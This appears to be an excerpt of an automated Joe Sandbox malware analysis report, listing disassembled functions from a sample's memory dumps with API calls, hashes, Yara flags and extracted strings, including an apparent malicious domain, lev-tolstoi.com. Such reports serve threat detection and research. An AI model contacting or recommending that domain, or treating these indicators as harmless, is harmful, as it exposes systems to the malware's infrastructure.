Similarity
• API ID:
• String ID: $%$)$.$?$C$K$Y$v$v
• API String ID: 0-1948704018
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: $%$)$.$?$C$K$Y$v$v
• API String ID: 0-1948704018
APIs
  • Part of subcall function 0043C330: LdrInitializeThunk.NTDLL(0043E40B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C35E
• FreeLibrary.KERNEL32(?), ref: 0041A7FA
• FreeLibrary.KERNEL32(?), ref: 0041A89B
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                                          • String ID: AB$I,~M$Wu$N@
                                                                                                                                                                                                                                                          • API String ID: 764372645-3264195455
                                                                                                                                                                                                                                                          • Opcode ID: 3c9db392397c6fdfae386d33a71b3b493e00643e59cb143520e15f2248edb9ae
                                                                                                                                                                                                                                                          • Instruction ID: e1ca4a59bde15fa5924e3eed146bb9730fe9803e238724338574477127e3de75
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3c9db392397c6fdfae386d33a71b3b493e00643e59cb143520e15f2248edb9ae
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ACA255352493009FD724DB24C881BABBBE3EBC5314F19C82EE5D587352D779D8868B86
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                          • String ID: AB$I,~M$N@
                                                                                                                                                                                                                                                          • API String ID: 3664257935-1338355008
                                                                                                                                                                                                                                                          • Opcode ID: 401f91f6926f723cc129c0a677715be08141d873c4625b0886a64bef750105ec
                                                                                                                                                                                                                                                          • Instruction ID: 196766abd8ce6fbe61f063082385e33dbd078fe73b8bf47651333deb28123581
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 401f91f6926f723cc129c0a677715be08141d873c4625b0886a64bef750105ec
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C6A222366583108FD724EB24C891B6FBBE3EBC5318F19882EE5D587352D7B5D8428B42
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: AF$EG$IK$stu
                                                                                                                                                                                                                                                          • API String ID: 0-1635301703
                                                                                                                                                                                                                                                          • Opcode ID: dc9b4c5ece35ad8c862ce3070bcb84a3f81ec2f455f2b909a682d3389be57742
                                                                                                                                                                                                                                                          • Instruction ID: 39eb04832eb88fb9aa3c4d3716742c09fe3224a1bca5495eee59028efd12266c
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc9b4c5ece35ad8c862ce3070bcb84a3f81ec2f455f2b909a682d3389be57742
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 75D168B5E00211DFDB10CF64D882A6BBB71FF46315F1581A9E941AF352E738A901CF99
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: '#%;$.1&*$066&$0~#/$_F$3B
                                                                                                                                                                                                                                                          • API String ID: 0-1609436745
                                                                                                                                                                                                                                                          • Opcode ID: d22eb257bb4fed3426fd1d2177278c913c958326b031723211245003450e7289
                                                                                                                                                                                                                                                          • Instruction ID: 7ea3dd8e245a26d41854b7de1f2706448979532b446e58bce8047c1e76753e38
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d22eb257bb4fed3426fd1d2177278c913c958326b031723211245003450e7289
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E6120D75608211DFE714CF28E89172BB7E2FB8A315F59893CE88297291D738ED11CB46
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          • GetCurrentProcessId.KERNEL32 ref: 0247885B
                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 02478865
                                                                                                                                                                                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 0247897A
                                                                                                                                                                                                                                                          • GetForegroundWindow.USER32 ref: 0247898F
                                                                                                                                                                                                                                                            • Part of subcall function 0247B627: FreeLibrary.KERNEL32(02478A45), ref: 0247B62D
                                                                                                                                                                                                                                                            • Part of subcall function 0247B627: FreeLibrary.KERNEL32 ref: 0247B64E
                                                                                                                                                                                                                                                          • ExitProcess.KERNEL32 ref: 02478A4C
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 3676751680-0
                                                                                                                                                                                                                                                          • Opcode ID: fe482df24c23ab2d83c4cdaab97ad3ceae6a21e14e152c6932b3668e755f558a
                                                                                                                                                                                                                                                          • Instruction ID: 21d54e58dd403255736acb78663528af83a7726465bdd7319e8330c0acff1f49
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe482df24c23ab2d83c4cdaab97ad3ceae6a21e14e152c6932b3668e755f558a
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F8514777F543180BC318AEFD8D8636AFAC65BC4610F0E813E9D99DB390E9B89C4546C4
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                          • String ID: _$uHHs$Wu
                                                                                                                                                                                                                                                          • API String ID: 3664257935-106544228
                                                                                                                                                                                                                                                          • Opcode ID: 5da1a61b1ac2646240e8ef51aa07ea68389517e308048d9ed602d276010136ed
                                                                                                                                                                                                                                                          • Instruction ID: 657a4d5abfb12f1dc895d1f067591f20c39952d2f974751b242cefe10b9506bf
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5da1a61b1ac2646240e8ef51aa07ea68389517e308048d9ed602d276010136ed
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 24D1D3606187E08AD7358F3994A07BBBBD1AFA7304F5849AED4C98B382C7394505CB57
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: +$4l/n$HI$AC$EG
• API String ID: 0-2131502145
• Opcode ID: 2326dbb95e7f5883c8c84f8d81630c06661b5b13304fd181672047a9092814e8
• Instruction ID: a4ec15649f5ce789aa249a628662369405bf800bf02bbfe84a00a1b55f3e5535
• Opcode Fuzzy Hash: 2326dbb95e7f5883c8c84f8d81630c06661b5b13304fd181672047a9092814e8
• Instruction Fuzzy Hash: B21233B650C3509BC704DF65CC926ABBBE2EF82314F08886DF4C58B391E7399945CB96

Strings
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID: '$.$`$m$x
• API String ID: 0-658611574
• Opcode ID: d64924eb30d76bfc61f9959272d5f030006163cc45ba092eb88482dec6fd7146
• Instruction ID: 6eb46bdc5475f176efbae29d38fa23e6adf793bd6e09a4fb574dbdc7b8e19eec
• Opcode Fuzzy Hash: d64924eb30d76bfc61f9959272d5f030006163cc45ba092eb88482dec6fd7146
• Instruction Fuzzy Hash: 0522A27291C7908BC725AF3884943AEBBD2ABD5324F194A2FD4ED97391D7748842CB43

Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: '$.$`$m$x
• API String ID: 0-658611574
• Opcode ID: fd5b69244993d46e929284a9bdd3bf796c8df4c9b55dffd7aefbb48e1f1effbb
• Instruction ID: 2144aee67b07277a24bb181582e3d7a2e9ec39ed2a6ddb42bc05191b79a9b14a
• Opcode Fuzzy Hash: fd5b69244993d46e929284a9bdd3bf796c8df4c9b55dffd7aefbb48e1f1effbb
• Instruction Fuzzy Hash: 1522F67250C7908BC7249F3884913EFBBE1ABD5324F194A2FE5E9973E1D67888418B47

Strings
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID: $869$2841$<5%"$LG$yx
• API String ID: 0-1687199681
• Opcode ID: 81a90c5b949388645e4c4577b2877a3cec77f85482f17fa4fd1f021cc46f1452
• Instruction ID: fdae4bce21484dd1b6c407482ff4757a8edc59c43d23349bf47ad78913a11a78
• Opcode Fuzzy Hash: 81a90c5b949388645e4c4577b2877a3cec77f85482f17fa4fd1f021cc46f1452
• Instruction Fuzzy Hash: 46C1277260C3D14FD7158F29C4507ABBFE2ABD2244F198A6EE4E59B382C779C406C762

Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: $869$2841$<5%"$LG$yx
• API String ID: 0-1687199681
• Opcode ID: 81a90c5b949388645e4c4577b2877a3cec77f85482f17fa4fd1f021cc46f1452
• Instruction ID: 6e29797cb701a68307395225b6e7be505ceeebb86d1407f7b9dd9bd878f88501
• Opcode Fuzzy Hash: 81a90c5b949388645e4c4577b2877a3cec77f85482f17fa4fd1f021cc46f1452
• Instruction Fuzzy Hash: 82C1247260C3914BD7158E29C4503ABBFE2ABD6204F18897EE8D59B3C3C67DC806C766

Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: $XZ$6t2v$k$TV$\^
• API String ID: 0-467934898
• Opcode ID: 935442da50ba2d5043c65627e36db0efaeaf6c014d5b582d321cc1546aeed32b
• Instruction ID: b605e89531a81705ebfe3af5fac37aee9194eb61735b639e3b3a85eadae14b77
• Opcode Fuzzy Hash: 935442da50ba2d5043c65627e36db0efaeaf6c014d5b582d321cc1546aeed32b
• Instruction Fuzzy Hash: B5E1F0B5608340DFE7209F14EC81B6FB7E0FB8A304F55892DE6C59B2A1DB359815CB4A

Strings
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID: $>$$>$/ $@G$xA
• API String ID: 0-3945432221
• Opcode ID: 90c64e1f23e03181c965945bf2a84877bb968eb59494c716de8320de25829884
• Instruction ID: d1d71060264184f7625529bc4b08e4a5382685551db11cbf1944df1e46eb587a
• Opcode Fuzzy Hash: 90c64e1f23e03181c965945bf2a84877bb968eb59494c716de8320de25829884
• Instruction Fuzzy Hash: 97B1F8B564C3608BC324CF1884906EFBBE2DFC2609F48096DE8E55B351C776894ACB83

Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: "7-0$,-$0$57DB89578F850E8625E054D164A37606$XO
• API String ID: 0-885611589
• Opcode ID: 96ffc6abc21e90aa4f60c2ac5e4c014c751766b9a0af1ae67335a06f1a6e3ed3
• Instruction ID: b14e87bd0a1771ab9c69b1f7aba9e5e6c348a9572cac4b455d4e49c452734ab2
• Opcode Fuzzy Hash: 96ffc6abc21e90aa4f60c2ac5e4c014c751766b9a0af1ae67335a06f1a6e3ed3
• Instruction Fuzzy Hash: 4FB1E5B16083409BD718DF25D8519AFBBE6EBC2314F14892DE0D69B382D738D50ACB5A

Strings
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID: +$40$c$xs$+
• API String ID: 0-1069988977
• Opcode ID: 0213a91b2d80012fb1b31493f043b6b78dca9e3c88a933d5aecf2aab1307a7db
• Instruction ID: beaaa4a5f68616f31ba7676442d39b1421c2318bb2bde7ceff6a36d813682f76
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0213a91b2d80012fb1b31493f043b6b78dca9e3c88a933d5aecf2aab1307a7db
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C861043154D3C28AD3119F7984D07ABFFE0AFA7254F18456EE8E04B382D37A850AD766
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: +$40$c$xs$+
                                                                                                                                                                                                                                                          • API String ID: 0-1069988977
                                                                                                                                                                                                                                                          • Opcode ID: 0213a91b2d80012fb1b31493f043b6b78dca9e3c88a933d5aecf2aab1307a7db
                                                                                                                                                                                                                                                          • Instruction ID: 337f816b89ebe18a5921aad55b72e827079c057bc6ea50a272954d896ed24b54
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 0213a91b2d80012fb1b31493f043b6b78dca9e3c88a933d5aecf2aab1307a7db
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D461F22154D3D28AE3019F79949036BFFE0AFA3350F18456EE8D41B382D77A890AD766
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "=$5$&[da$'%.W$\X
                                                                                                                                                                                                                                                          • API String ID: 0-3996675343
                                                                                                                                                                                                                                                          • Opcode ID: 3b4b3338808811478b25342cb31a8a8ddb2f31bec34827d1a2cf89aded2df0b7
                                                                                                                                                                                                                                                          • Instruction ID: b2db28a04d33f4deade6fb315abc92128a44a32aa9af0cc96827e4d4876d841a
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b4b3338808811478b25342cb31a8a8ddb2f31bec34827d1a2cf89aded2df0b7
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6F62497190C3918FC321DF29C89066FBFE1AF95214F19876EE8E54B792D7318909CB92
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: FreeLibrary
                                                                                                                                                                                                                                                          • String ID: _$uHHs
                                                                                                                                                                                                                                                          • API String ID: 3664257935-2879388440
                                                                                                                                                                                                                                                          • Opcode ID: 4e91dc025a6f01339c4642c8171ef5ad3519262cb00870dcedb663402979482b
                                                                                                                                                                                                                                                          • Instruction ID: 25205facd5b5c1f1c06fef362e3c006c72b04f90462c37e5498cfb5a456e2fd9
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 4e91dc025a6f01339c4642c8171ef5ad3519262cb00870dcedb663402979482b
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 74D1A3706183D08ADB35CB3584A17BBBFE1AF97209F0849AED4C98B782D7394505CB53
                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID: MetricsSystem
                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                          • API String ID: 4116985748-3916222277
                                                                                                                                                                                                                                                          • Opcode ID: e1c78a85c073594b75890c03197e051504a5e28f3cbe51423f7dbecb5aa6b388
                                                                                                                                                                                                                                                          • Instruction ID: 9919e99d947470de0ad43a1edc8932ab1666953d7c59876c21ae7e6382b5c0c6
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: e1c78a85c073594b75890c03197e051504a5e28f3cbe51423f7dbecb5aa6b388
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 735161B4E152189FDB40EFACD98569DBBF0BB88300F114529E498E7360D734AD84CF96
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: "7-0$,-$0$XO
                                                                                                                                                                                                                                                          • API String ID: 0-3383152870
                                                                                                                                                                                                                                                          • Opcode ID: 7e112ea5793d11c79ed244ae7d7952959776df1f25fc16c3ee4f57ebed7bce44
                                                                                                                                                                                                                                                          • Instruction ID: 782b4fd97bae478f74a1867c8a644a08a8a3b62e38e2bc01f29641098b9758b7
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7e112ea5793d11c79ed244ae7d7952959776df1f25fc16c3ee4f57ebed7bce44
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4DB1D8B12083809BD718DF259855AAFBBE6EFC2314F14896DE0E68B381D739C509CB16
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
                                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                                          • String ID: 255B$8A23$C566$E5E1
                                                                                                                                                                                                                                                          • API String ID: 0-3367982953
                                                                                                                                                                                                                                                          • Opcode ID: f0eae71c9d6d3c7835d1a474653f2e65b944a28a3ad533d021ed57ddccbba122
                                                                                                                                                                                                                                                          • Instruction ID: bca8cd79a4aa6442c91b48111e7ffcc9cc5938a4bcbc4301a89260964893c1f0
                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f0eae71c9d6d3c7835d1a474653f2e65b944a28a3ad533d021ed57ddccbba122
                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: FAA10C616593924BE3348B258C91BEFB7D1EBD2214F088B7DC4E897792F33844029792
                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: 255B$8A23$C566$E5E1
• API String ID: 0-3367982953
• Opcode ID: f0eae71c9d6d3c7835d1a474653f2e65b944a28a3ad533d021ed57ddccbba122
• Instruction ID: c9ab22a39130a17e05ee61a651d87010c03896c5afd99520b9bc1921e18da37f
• Opcode Fuzzy Hash: f0eae71c9d6d3c7835d1a474653f2e65b944a28a3ad533d021ed57ddccbba122
• Instruction Fuzzy Hash: 03A12B316593924BD3348B258C91BEBBBE1EBD2314F088A7DD4D897792F73848069792
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID:
• String ID: 4l/n$HI$AC$EG
• API String ID: 0-4032564853
• Opcode ID: c7ee6880a574bd16a93718f20b38e443ce83357569437b4de60bae4c0ef18ea8
• Instruction ID: ec981e25fdb38ed29b7cf948df3251a17e20e061734d81aaf48734619a7b4014
• Opcode Fuzzy Hash: c7ee6880a574bd16a93718f20b38e443ce83357569437b4de60bae4c0ef18ea8
• Instruction Fuzzy Hash: 9891EF75A183508BCB18EF29CC927BBB7E1EF85314F08996DE8958B3D1E7389504C752
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID:
• String ID: XY$AC$IK$MO
• API String ID: 0-664538580
• Opcode ID: 0b73aad8a95d2f06891519b54b1f3653af007b234c1babc73ac4eaa6f42c3391
• Instruction ID: 39428194e500b5a53c6aae23f15327502ea0c60e828c0b8a3651ea1546d1f37d
• Opcode Fuzzy Hash: 0b73aad8a95d2f06891519b54b1f3653af007b234c1babc73ac4eaa6f42c3391
• Instruction Fuzzy Hash: 9A8124B6A09310DFD7109F25E84172FB7E1ABC5304F154A3EE98597381EB38E9058B8B
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665696696.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_2470000_3zg6i6Zu1u.jbxd
Yara matches
Similarity
• API ID: Uninitialize
• String ID: D$lev-tolstoi.com
• API String ID: 3861434553-4021809485
• Opcode ID: c6607468542c65a9894b4d5e932ac42de7adf9d9df50bf63ac7d2a47c1c64f60
• Instruction ID: b7591ffd02cfd363ba7f996fd032be5b5e8c88783f6f784d22aa68a678f95a7e
• Opcode Fuzzy Hash: c6607468542c65a9894b4d5e932ac42de7adf9d9df50bf63ac7d2a47c1c64f60
• Instruction Fuzzy Hash: 1DA1EEB55193D28BD335CF2584A0BEBBBE1AFD6304F08896DC0EA4B351D7754506CB92
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID: Uninitialize
• String ID: D$lev-tolstoi.com
• API String ID: 3861434553-4021809485
• Opcode ID: c6607468542c65a9894b4d5e932ac42de7adf9d9df50bf63ac7d2a47c1c64f60
• Instruction ID: db83cc6d0157fc327276ba6685622738ae1c34c2f9734926ad1cda59646cf540
• Opcode Fuzzy Hash: c6607468542c65a9894b4d5e932ac42de7adf9d9df50bf63ac7d2a47c1c64f60
• Instruction Fuzzy Hash: 8BA110B55083928FD335CF2584A07EBBBE1AFD6300F0889ADD0D95B392D775490ACB96
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.1665073567.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1665073567.0000000000454000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_3zg6i6Zu1u.jbxd
Similarity
• API ID: Uninitialize
• String ID: D$lev-tolstoi.com
• API String ID: 3861434553-4021809485
